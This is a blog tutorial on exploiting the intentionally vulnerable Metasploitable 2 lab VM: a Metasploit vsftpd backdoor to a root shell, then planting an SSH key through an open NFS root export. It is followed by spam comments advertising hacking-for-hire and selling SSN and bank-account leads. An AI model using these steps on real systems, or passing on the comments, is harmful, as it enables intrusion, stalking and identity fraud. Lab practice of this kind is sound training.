Wednesday, 27 May 2015

Metasploitable2: Hack FTP Server and NFS Server using Kali Linux


The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. For Instructions on how to install Metasploitable 2 Virtual Machine in KVM, refer to this post.

In a previous post , we carried out a Vulnerability Scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali LInux.  

In the scan found the following vulnerability in 'vsftpd'.

vsftpd Compromised Source Packages Backdoor Vulnerability



In this tutorial, we will exploit this vulnerability using Metasploit and get 'root' access on the machine.

1) Start Metasploit.
root@kali:~# msfconsole


2) Search for the vsftpd vulnerability
msf > search vsftpd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


3) Use the vulnerability
msf > use exploit/unix/ftp/vsftpd_234_backdoor


4) Set the IP address of the 'victim' machine
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.122.73
RHOST => 192.168.122.73


5) Exploit the vulnerability and get root access.
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.122.115:42588 -> 192.168.122.73:6200) at 2015-05-27 14:29:55 +0530

id
uid=0(root) gid=0(root)


After an attacker has gained 'root' access, he will typically install a rootkit, so that he can come and go at will and hide his activities from the administrator. The rootkit will attempt to remove all traces of an attacker's presence from the log files. And replace binaries such as ls, ps, ifconfig, killall, netstat, lsof, passwd. In a future tutorial, we will see how to use 'tripwire' and 'chkrootkit' to detect rootkits.


Attack NFS and get root login

During the Vulnerability Scan of the 'Metasploitable 2' virtual machine in a previous post, we found the following misconfiguration in NFS Server.

The Root File System is exported in read/write mode.





root@kali:~# showmount -e 192.168.122.73
Export list for 192.168.122.73:/ *


Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file:


root@kali:~# mount -o nolock 192.168.122.73:/ /mnt


root@kali:~# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase):  
Enter same passphrase again:  
Your identification has been saved in /root/.ssh/id_rsa. 
Your public key has been saved in /root/.ssh/id_rsa.pub.


root@kali:~# cat .ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys


root@kali:~# umount /mnt


root@kali:~# ssh 192.168.122.73
Last login: Mon May 25 07:46:57 2015 from :0.0 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 
root@metasploitable:~#




3 comments:

  1. We are a team of Professional Hackers and private investigators
    we provide PROOF BEFORE PAYMENT
    EMAIL: hireaprohacker@gmail.com
    Website: http://hireaprohacker.wix.com/hireapro

    ReplyDelete
  2. never knew that a phone could be hacked without having physical access with it, all this hacker asked for were a few information on my partner to got into the phone. I immediately contacted him and got everything that my fiancee had been hiding,She was having an affair with 2 other men which was sickening I must say..

    I can confidently recommend for any one interested in hacking any device, app,upgrade of school result and credit score upgrade.He would be willing to help you.You can contact him via his details below

    Gmail-HACKINTECHNOLOGY@gmail.com.

    +16692252253

    ReplyDelete
  3. Hi All!

    I'm selling fresh & genuine SSN Leads, with good connectivity. All data properly checked & verified.
    Headers in Leads:

    First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name | DL Number | Routing Number | IP Address | Reference | Email | Rental/Owner |

    *You can ask for sample before any deal
    *Each lead will be cost $1
    *Premium Lead will be cost $5
    *If anyone wants in bulk I will negotiate
    *Sampling is just for serious buyers

    Hope for the long term deal
    For detailed information please contact me on:

    Whatsapp > +923172721122
    email > leads.sellers1212@gmail.com
    telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete